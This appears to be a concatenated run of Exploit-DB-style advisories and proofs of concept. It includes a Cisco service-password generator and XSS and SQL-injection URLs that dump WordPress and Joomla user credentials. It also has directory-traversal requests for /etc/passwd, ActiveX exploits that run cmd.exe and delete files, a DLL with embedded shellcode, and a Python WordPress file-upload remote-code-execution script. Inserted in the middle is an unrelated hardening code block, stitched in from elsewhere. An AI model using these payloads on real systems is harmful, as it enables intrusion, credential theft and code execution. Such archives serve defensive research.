	if (argc < 2) { usage(argv[0]); }
	int opt;
	int index;
	char *temp_pass = { 0 };
	char *serial_no = { 0 };
	char *secret_pass = SECRET_PASS;
	char service[MAX_BUFFER] = { 0 };
	unsigned char digest[16] = { 0 };
	while ((opt = getopt(argc, argv, "p:s:h")) != -1) {
		switch (opt)
		{
		case 'p': 
			temp_pass = optarg;
			break;
		case 's':
			serial_no = optarg;
			break;
		case 'h': usage(argv[0]);
			break;
		default:
			printf_s("Wrong Argument: %s\n", argv[1]);
			break;
		}
	}
	
	for (index = optind; index < argc; index++) {
		usage(argv[0]);
		exit(0);
	}

	if (temp_pass == NULL || serial_no == NULL) { 
		usage(argv[0]);
		exit(0); 
	}

	if ((strlen(temp_pass) <= sizeof(service)) && (strlen(serial_no) <= sizeof(service))) {
		to_lower(serial_no);
		fuzz_string(temp_pass);
		strcpy_s(service, sizeof(service), temp_pass);
		strcat_s(service, sizeof(service), serial_no);
		strcat_s(service, sizeof(service), secret_pass);

		MD5_CTX context;
		MD5_Init(&context);
		MD5_Update(&context, service, strlen(service));
		MD5_Final(digest, &context);
		printf_s("Service Password: ");
		for (int i = 0; i < sizeof(digest)-12; i++)
			printf("%02x", digest[i]);
	} 

	return 0;
}

void fuzz_string(char *str) {
	while (*str){
		switch (*str) {
		case '1': *str = 'i'; break;
		case '0': *str = 'o'; break;
		case '_': *str = '-'; break;
		}
		str++;
	}
}

void to_lower(char *str) {
	while (*str) {
		if (*str >= 'A' && *str <= 'Z') {
			*str += 0x20;
		}
		str++;
	}
}

void usage(char *name) {
	printf_s("\nUsage: %s -p password -s serial\n", name);
	printf_s(" -p <password> | Cisco Service Temp Password\n");
	printf_s(" -s <serial> | Cisco Serial Number\n");
	printf_s(" -h | This Help Menu\n");
	printf_s("\n Example: %s -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4\n", name);
	exit(0);
}
            
source: https://www.securityfocus.com/bid/48464/info

Sybase Advantage Server is prone to an off-by-one buffer-overflow vulnerability.

Attackers may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.

Sybase Advantage Server 10.0.0.3 is vulnerable; other versions may also be affected. 

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35886.zip


#######################################################################

                             Luigi Auriemma

Application:  Sybase Advantage Server
              http://www.sybase.com/products/databasemanagement/advantagedatabaseserver
Versions:     <= 10.0.0.3
Platforms:    Windows, NetWare, Linux
Bug:          off-by-one
Exploitation: remote, versus server
Date:         27 Jun 2011 (found 29 Oct 2010)
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's website:
"Advantage Database Server is a full-featured, easily embedded,
client-server, relational database management system that provides you
with Indexed Sequential Access Method (ISAM) table-based and SQL-based
data access."


#######################################################################

======
2) Bug
======


By default the Advantage server (ADS process) listens on UDP and TCP
port 6262; optionally, a so-called "internet port" for non-LAN
connections can also be configured.

The problem is rather unusual and affects the code that handles a
certain type of packet on the UDP port.
In short, the server does the following:
- it uses memcpy to copy the data from the packet into a stack buffer
  of exactly 0x2b8 bytes (handled as 0x2b9 bytes)
- later this data is handled as a string, but no final NULL byte
  delimiter is inserted
- there is also an off-by-one bug, since one byte overwrites the low
  8 bits of a saved element (a stack pointer 017bff??)
- after this buffer are located some pushed elements and obviously the
  return address of the function
- it calls the OemToChar API, which changes some bytes of the buffer
  (like those greater than 0x7f) until it reaches a 0x00 that "luckily"
  is located after the return address
- so the return address also gets modified, exactly from 0084cb18 to
  00e42d18, which ironically is a valid stack frame somewhat related to
  the startup of the service
- the data inside this stack address doesn't seem changeable from
  outside and has tons of 0x00 bytes that in this case act like NOPs
  until the zone around 00ebf05b, where some pushed elements are located
- the EBX register contains two bytes of the attacker's data and EBP
  points to such data

The following is a summary of these operations:

 017BF66B  61 61 61 61 61 61 61 61 61 61 61 61 61 61 FF 7B  aaaaaaaaaaaaaa.{
 017BF67B  01 99 26 C1 71 BC F6 7B 01 18 CB 84 00 00 00 00  ..&.q..{........
                                      |---------|
                                      original return address

 0084B81D  |. FF15 DC929000   CALL DWORD PTR DS:[<&USER32.OemToCharA>]

 017BF66B  61 61 61 61 61 61 61 61 61 61 61 61 61 61 A0 7B  aaaaaaaaaaaaaa.{
 017BF67B  01 D6 26 2D 71 2B F7 7B 01 18 2D E4 00 00 00 00  ..&-q+.{..-.....
                                      |---------|
                                      new return address

 00E42D18  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
 00E42D28  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
 ...
 00EBF04B  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
 00EBF05B  00 99 78 82 7C 4A EC 82 7C 20 00 00 00 A0 F0 EB  ..x.|J..| ......
 00EBF06B  00 A0 F0 EB 00 00 00 00 00 68 F1 EB 00 01 00 00  .........h......
 00EBF07B  00 5C F1 EB 00 D1 0F E7 77 A0 F0 EB 00 00 00 00  .\......w.......
 00EBF08B  00 51 02 02 00 EC 0F E7 77 00 D0 FD 7F 00 00 00  .Q......w.......
 00EBF09B  00 01 00 00 00 18 00 34 00 02 00 00 00 7C 0A 00  .......4.....|..
 00EBF0AB  00 14 0D 00 00 1C 75 17 00 00 00 00 00 00 00 00  ......u.........
 00EBF0BB  00 51 02 02 00 08 00 00 C0 00 00 00 00 00 00 00  .Q..............

 The code flow usually arrives at 00ebf0ab or other addresses close
 to it, depending on the data saved there when the service started.

Exploiting this vulnerability would require a "jmp ebp" or "call ebp",
or a sequence of instructions with a similar effect, in the 00ebf05b
zone, which seems a rare enough event.

I have not tested the Linux and NetWare platforms, so I don't know if
the problem exists there too and if there are more chances of
exploiting it.
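As an added example (not code from the advisory or from the vendor), the handler below mirrors the bug class just described: a 0x2b8-byte stack buffer that receives raw packet bytes with no terminator and is then walked by a string routine. It shows the hardened copy with an explicit NUL and the off-by-one rejection, plus the terminator check a reviewer or fuzz harness can apply; the function names and the byte-translation stand-in for OemToChar are assumptions.

```c
#include <stddef.h>
#include <string.h>

#define BUF_SIZE 0x2b8   /* size of the stack buffer described in the advisory */

/* Portable stand-in (assumption, not the Windows API) for an in-place
 * OEM-to-ANSI style translation: it rewrites every byte above 0x7f and
 * stops only at the first 0x00. That stop condition is exactly why a
 * missing terminator lets the routine run past the buffer and into the
 * saved return address. Returns the number of bytes it walked. */
static size_t translate_until_nul(unsigned char *s)
{
    size_t n = 0;
    while (s[n] != 0) {
        if (s[n] > 0x7f)
            s[n] = '?';   /* constructed replacement; the real API maps to another code page */
        n++;
    }
    return n;
}

/* Hardened handler: copies 'len' packet bytes into 'out' (BUF_SIZE bytes),
 * terminates them, and runs the translation. Returns the resulting string
 * length, or -1 when the payload does not fit together with its NUL.
 * len == BUF_SIZE is precisely the off-by-one case the original code hit. */
int handle_packet_safe(const unsigned char *pkt, size_t len, unsigned char *out)
{
    if (pkt == NULL || out == NULL || len >= BUF_SIZE)
        return -1;
    memcpy(out, pkt, len);
    out[len] = 0;   /* the explicit terminator the original code lacked */
    /* Bounded by our own terminator now, not by whatever 0x00 happens to
     * sit further up the stack. */
    return (int)translate_until_nul(out);
}

/* Review / harness check: does the buffer contain a NUL within its
 * declared size, i.e. is it safe to hand to any string routine? */
int is_nul_terminated(const unsigned char *buf, size_t size)
{
    return memchr(buf, 0, size) != NULL;
}

/* Self-checks used by main(); they return 1 on success, 0 on failure. */
int check_exact_size_rejected(void)
{
    unsigned char pkt[BUF_SIZE], out[BUF_SIZE];
    memset(pkt, 'a', sizeof pkt);   /* constructed 0x2b8-byte payload of 'a' */
    return handle_packet_safe(pkt, BUF_SIZE, out) == -1
        && handle_packet_safe(pkt, BUF_SIZE - 1, out) == BUF_SIZE - 1
        && is_nul_terminated(out, BUF_SIZE);
}

int check_translation_bounded(void)
{
    /* constructed payload with high bytes, like the ff 7b pair in the dump */
    const unsigned char pkt[4] = { 0x61, 0xff, 0x7b, 0x80 };
    unsigned char out[BUF_SIZE];
    if (handle_packet_safe(pkt, 4, out) != 4)
        return 0;
    return out[0] == 'a' && out[1] == '?' && out[2] == 0x7b
        && out[3] == '?' && out[4] == 0;
}

int main(void)
{
    return (check_exact_size_rejected() && check_translation_bounded()) ? 0 : 1;
}
```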


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
http://aluigi.org/poc/ads_crc.zip

  udpsz -C 0012 -L ads_crc.dll -b 0x61 SERVER 6262 0x592


#######################################################################

======
4) Fix
======


No fix.

UPDATE:
The vendor has fixed the bug in version 10.10.0.16, released in July 2011:
http://devzone.advantagedatabase.com/dz/content.aspx?key=44&id=ef0915fb-44c2-fe4b-ac26-9ed3359cffff


#######################################################################
            
source: https://www.securityfocus.com/bid/48462/info

Ubisoft CoGSManager ActiveX control is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds check user-supplied input.

Attackers can exploit this issue to execute arbitrary code within the context of an application (typically Internet Explorer) that uses the ActiveX control. Failed exploit attempts will result in a denial-of-service condition.

Ubisoft CoGSManager ActiveX control 1.0.0.23 is vulnerable. 

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35885.zip
            
source: https://www.securityfocus.com/bid/48455/info

Mambo CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Mambo CMS 4.6.5 is vulnerable; other versions may also be affected.

http://www.example.com/mambo/index.php?option=com_content&task=%22%20style=width:1000px;height:1000px;top:0;left:0;position:absolute%20onmouseover=alert%28/XSS/%29%20&id=3&Itemid=32

http://www.example.com/mambo/administrator/index2.php?option=com_menumanager&task=edit&hidemainmenu=1&menu=Move+your+mouse+here%22%20style=position:absolute;width:1000px;height:1000px;top:0;left:0;%20onmouseover=alert%28/XSS/%29%20

http://www.example.com/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS

http://www.example.com/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20%20%20style=background-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS

http://www.example.com/mambo/administrator/index2.php?limit=10&order%5b%5d=11&boxchecked=0&toggle=on&search=simple_search&task=&limitstart=0&cid%5b%5d=on&zorder=c.ordering+DESC"><script>alert(/XSS/)</script>&filter_authorid=62&hidemainmenu=0&option=com_typedcontent

http://www.example.com/mambo/administrator/index2.php?limit=10&boxchecked=0&toggle=on&search=xss"><script>alert(/XSS/)</script>&task=&limitstart=0&hidemainmenu=0&option=com_comment

http://www.example.com/mambo/administrator/index2.php?option=com_modules&client=%27%22%20onmouseover=alert%28/XSS/%29%20a=%22%27

http://www.example.com/mambo/administrator/index2.php?option=com_categories&section=com_weblinks"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2

http://www.example.com/mambo/administrator/index2.php?option=com_categories&section=com_weblinks"%20style%3d-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss)%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2

http://www.example.com/mambo/administrator/index2.php?option=com_categories&section=com_weblinks"%20%20style=background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2

http://www.example.com/mambo/administrator/index2.php?option=com_categories&section=com_weblinks"%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;dis

http://www.example.com/mambo/administrator/index2.php?option=com_categories&section=com_weblinks"%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2
            
source: https://www.securityfocus.com/bid/48452/info

The 'com_morfeoshow' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&Itemid=114&idm=1015+and+1=0+union+select+1,2,concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+ 
            
source: https://www.securityfocus.com/bid/48451/info

Nodesforum is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 

http://www.example.com/?_nodesforum_node=u1' 
            
/*
source: https://www.securityfocus.com/bid/48432/info

xAurora is prone to a vulnerability that lets attackers execute arbitrary code.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. 
*/

#include <windows.h>
#include <stdlib.h>
#include <string.h>


char shellcode[]="\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"
"\x2e\x65\x78\x65\x00";

int xAuroraPwnage()
{
    int *ret;
    ret = (int *)&ret + 2;       /* location of this function's saved return address */
    (*ret) = (int)shellcode;     /* redirect the return into the embedded shellcode */
    MessageBox(0, "[+] xAurora Pwned By Zer0 Thunder !", "Not so Secured Browser", MB_OK);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    xAuroraPwnage();
    return 0;
}
            
source: https://www.securityfocus.com/bid/48408/info

LEADTOOLS Imaging LEADSmtp ActiveX control is prone to a vulnerability caused by an insecure method.

Successfully exploiting this issue will allow attackers to create or overwrite files within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Attackers may execute arbitrary code with user-level privileges. 

<html>
<object classid='clsid:0014085F-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
arg1="FilePath\Filename_to_overwrite"
arg2=True
target.SaveMessage arg1 ,arg2
End Sub

</script>
</html>
            
# Exploit Title: Remote Code Execution via Unauthorised File upload in Cforms 14.7 
# Date: 2015-01-19
# Exploit Author: Zakhar
# Vendor Homepage: https://wordpress.org/plugins/cforms2/
# Software Link: https://downloads.wordpress.org/plugin/cforms2.zip
# Version: 14.7
# Tested on: Wordpress 4.0
# CVE : 2014-9473

import os
import requests
import re
import base64
import sys
from lxml import etree
from optparse import OptionParser

def main():
	print 'Cforms II File Upload + Remote Code Execution\n'
	
	text = 'Test text'
	text_mail = 'test@mail.com'

	parser = OptionParser()
	parser.add_option("-f", "--file", dest="file", help="file to upload", default = "itest.php", metavar="FILE")
	parser.add_option("-i", "--max-iterations", dest="iterations", help="Number of fields to iterate", default = "10")
	parser.add_option("-b", "--upload-file-name-bruteforce", dest="brute", help="Uploaded file name brute force", default = "10")
	parser.add_option("-n", "--cforms-form-number", dest="number", help="Cforms form number", default = "")
	parser.add_option("-c", "--cforms-home-dir", dest="home", help="Cforms form home dir", default = "/wp-content/plugins/cforms2/")
	parser.add_option("-u", "--url", dest="url", help="vulnerable url with contact form, example: http://127.0.0.1/Contact/")

	(opt, args) = parser.parse_args()
	options = opt.__dict__
	if not opt.url:   # if url is not given
		parser.error('URL not given')
	if not opt.file:
		parser.error('file not given')
	filename = options["file"]
	if os.path.isfile(filename) is not True:
		print 'No such file '+filename 
		return 0

	url = options['url']
	home = options["home"]
	i = options["iterations"]
	n = options["number"]
	b = options["brute"]
	
	s = requests.Session()
	
	r = s.get(url)
	if r.status_code != requests.codes.ok:
		print 'Error: website not found.'
		return 0
	
	tree = etree.HTML(r.text)
	# get cforms id
	if n == "":
		for x in xrange(2,10):
			for node in tree.xpath('//*[@id="cforms'+str(x)+'form"]'):
				if node is not None:
					n = str(x)
					break
	print 'Cforms form number is <'+n+'>'
	hidden = ['cf_working'+n,'cf_failure'+n,'cf_codeerr'+n,'cf_customerr'+n,'cf_popup'+n]
	fields = ['cf'+n+'_field_'+str(x) for x in xrange(1,int(i)+1)]
	required = {'sendbutton'+n:'1'}
	
	for f in fields:
		for node in tree.xpath('//*[@id="' + f + '"]'):
			if node is not None:
				if 'fldrequired' in node.get('class'):
					if 'fldemail' in node.get('class'):
						required[f] = text_mail
					else:
						required[f] = text
	
	for h in hidden:
		for node in tree.xpath('//*[@id="' + h + '"]'):
			if node is not None:
				required[h] = node.get('value')
	
	for node in tree.xpath('//*[@id="cforms_captcha'+n+'"]'):
		if node is not None:
			print 'Error: Cforms uses captcha. Sorry, you have to exploit it manually.'
			return 0
	
	files = {'cf_uploadfile'+n+'[]':('wow.php',open(filename, 'rb'))}
	r = s.post(url,data=required,files=files)
	
	if r.status_code != requests.codes.ok:
		print 'Error: post error.'
		print r.status_code
		return 0
	else:
		url1 = url + home + 'noid-wow.php'
		flag = 0
		if s.get(url1).status_code != requests.codes.ok:
			for l in xrange(1,int(b)):
				url1 =  url + home + str(l) + '-wow.php'
				print url1
				if s.get(url1).status_code == requests.codes.ok:
					flag = 1
					break
		else:
			flag = 1
		if flag == 1:
			print "Success! Uploaded file: " + url1
		else:
			print "Uploaded file not found. Try to increase -b flag or change upload dir. 14.6.3 version and above use wordpress upload folder"

main()
            
##################################################################################################
#Exploit Title : ecommercemajor ecommerce CMS SQL Injection and Authentication bypass
#Author        : Manish Kishan Tanwar
#Home page Link : https://github.com/xlinkerz/ecommerceMajor
#Date          : 22/01/2015
#Discovered at : IndiShell Lab
#Love to      : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti,Kishan Singh and ritu rathi
#email        : manish.1046@gmail.com
##################################################################################################

////////////////////////
/// Overview:
////////////////////////

ecommercemajor is a PHP-based CMS for ecommerce portals.

///////////////////////////////
// Vulnerability Description:
///////////////////////////////

SQL injection vulnerability:-
============================== 
In product.php, data from the GET parameter 'productbycat' is not filtered before being passed into an SQL query, giving rise to an SQL injection vulnerability:
---------------------
$getallproduct="select * from purchase where status='enable' and catid=$_GET[productbycat] order by id desc";
---------------------
POC

http://127.0.0.1/ecommercemajor/product.php?productbycat=SQLI


Authentication Bypass:-
============================== 
The file index.php under the __admin directory has an SQL injection vulnerability:
the username and password supplied as POST parameters, used to check for a valid admin login, are not filtered before being passed into the SQL query, which leads to an authentication bypass.
The vulnerable code is:
-------------------
	if(isset($_POST[login]))
		{
$check="select * from adminlogin where username='$_POST[username]' and password='$_POST[username]'";
			$checkresult=mysql_query($check);
			$checkcount=mysql_num_rows($checkresult);
			if($checkcount>0)
				{	
					$checkrow=mysql_fetch_array($checkresult);
					$_SESSION[adminname]=$checkrow[adminname];
					$_SESSION[adminloginstatus]="success";
					echo "<script>window.location='home.php';</script>";
				}
--------------------
POC

open admin panel 
http://127.0.0.1/ecommercemajor/__admin/
username: ' or '1337'='1337
password: ' or '1337'='1337



                             --==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Das
#############################################################################################
                             --==[[Love to]]==--
#Kishan Tanwar,Mrs. Ritu Rathi,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik)
                       --==[[ Special Fuck goes to ]]==--
                            <3  suriya Cyber Tyson <3
            
source: https://www.securityfocus.com/bid/48399/info

Sitemagic CMS is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain arbitrary local files in the context of the webserver process. 

http://www.example.com/smcmsdemoint/index.php?SMTpl=../../../../../../../../../../etc/passwd%00.png 
            
source: https://www.securityfocus.com/bid/48393/info

Easewe FTP OCX ActiveX control is prone to multiple insecure-method vulnerabilities.

Attackers can exploit these issues to perform unauthorized actions or execute arbitrary programs. Successful exploits may result in compromise of affected computers.

Easewe FTP OCX ActiveX control 4.5.0.9 is vulnerable; other versions may also be affected. 

1.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="c:\windows\system32\cmd.exe"
arg2=""
arg3=1
target.Execute arg1 ,arg2 ,arg3
End Sub
</script>
</html>

2.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="c:\windows\system32\cmd.exe"
arg2=""
arg3=1
target.Run arg1 ,arg2 ,arg3
End Sub
</script>
</html>

3.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
arg1="FilePath\Filename_to_create"
target.CreateLocalFile arg1
End Sub

</script>
</html>

4.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
arg1="Directorypath\Directory"
target.CreateLocalFolder arg1
End Sub

</script>
</html>

5.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
arg1="FilePath\Filename_to_delete"
target.DeleteLocalFile arg1
End Sub
</script>
</html>

<HTML>
Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit<br>
<br>
Description: There is an insecure method in the (LocalFileCreate) function<br>
Found By : coolkaveh<br>

<title>Exploited By : coolkaveh </title>
<BODY>
 <object id=cyber
classid="clsid:{31AE647D-11D1-4E6A-BE2D-90157640019A}"></object>

<SCRIPT>

function Do_it()
 {
     File = "kaveh.txt"
   cyber.LocalFileCreate(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br>
</body>
</HTML>
            
source: https://www.securityfocus.com/bid/48392/info

FanUpdate is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

FanUpdate 3.0 is vulnerable; other versions may also be affected. 

http://www.example.com/header.php?pageTitle=%3C/title%3E%3Cscript%3Ealert%28123%29;%3C/script%3E
            
source: https://www.securityfocus.com/bid/48391/info

Eshop Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 

http://www.example.com/path/catalogue.php?id_shop=7[SQLI]
http://www.example.com/path/article.php?id_article=7[SQLI]
http://www.example.com/path/banniere.php?id_article=7[SQLI]
http://www.example.com/path/detail_news.php?id_article=7[SQLI]
http://www.example.com/path/detail_produit.php?id_shop=3&ref=200308G[SQLI] 
            
source: https://www.securityfocus.com/bid/48217/info

Tolinet Agencia is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 

http://www.example.com/index.php?tip=art&id=2' <- blind sql 
            
source: https://www.securityfocus.com/bid/48389/info

Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer-dereference error.

An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition.

Wireshark 1.4.5 is vulnerable. 

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35873.pcap
            
source: https://www.securityfocus.com/bid/48215/info


The Pacer Edition CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

The Pacer Edition CMS RC 2.1 is vulnerable; prior versions may also be affected. 

<html>
<title>Pacer Edition CMS 2.1 Remote XSS POST Injection Vulnerability</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">function xss1(){document.forms["xss"].submit();}</script>
<form action="http://www.example.com/admin/login/forgot/index.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
<input type="hidden" name="url" value="1" />
<input type="hidden" name="email" value=&#039;%F6"+onmouseover=prompt(31337)&#039; />
<input type="hidden" name="button" value="Send%20Details" />
</form>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><center><h3><br /><br />Exploit!</h3></center></font></b></a>
</body>
</html>
            
source: https://www.securityfocus.com/bid/48167/info

The Perl Data::FormValidator module is prone to a security-bypass vulnerability.

An attacker can exploit this issue to bypass certain security restrictions and obtain potentially sensitive information.

Data::FormValidator 4.66 is vulnerable; other versions may also be affected.

#!/opt/perl/5.12/bin/perl

use strict;
use warnings;

use Data::FormValidator;

"some_unrelated_string" =~ m/^.*$/;

my $profile = {
untaint_all_constraints => 1,
required => [qw(a)],
constraint_methods => {
a => qr/will_never_match/,
},
};

my $results = Data::FormValidator->check({ a => 1 }, $profile);
warn $results->valid('a');
            
source: https://www.securityfocus.com/bid/48166/info

The GD Star Rating plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/wp-content/plugins/gd-star-rating/ajax.php?_wpnonce=<insert_valid_nonce>&vote_type=cache&vote_domain=a&votes=asr.1.xxx.1.2.5+limit+0+union+select+1,0x535242,1,1,concat(0x613a313a7b733a363a226e6f726d616c223b733a323030303a22,substring(concat((select+concat(user_nicename,0x3a,user_email,0x3a,user_login,0x3a,user_pass)+from+wp_users+where+length(user_pass)%3E0+order+by+id+limit+0,1),repeat(0x20,2000)),1,2000),0x223b7d),1,1,1+limit+1
            
source: https://www.securityfocus.com/bid/48132/info

BLOG:CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

BLOG:CMS 4.2.1.f is vulnerable; other versions may also be affected. 

http://www.example.com/blogcms/photo/index.php?"<script>alert(0x0029A)</script>
http://www.example.com/blogcms/photo/index.php?"<script>alert(&#039;XSS&#039;);</script>

http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert(&#039;XSS&#039;);</script>
http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert(0x0029A)</script>

http://www.example.com/blogcms/admin/plugins/mailtoafriend/mailfriend.php
            
source: https://www.securityfocus.com/bid/48126/info

Xataface is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

NOTE (July 4, 2011): The vendor indicates that this issue affects versions prior to Xataface 1.2.6, while the reporter indicates 1.3rc1 and 1.3rc2 are affected. 

http://www.example.com/index.php?-action=../../../../../../etc/passwd%00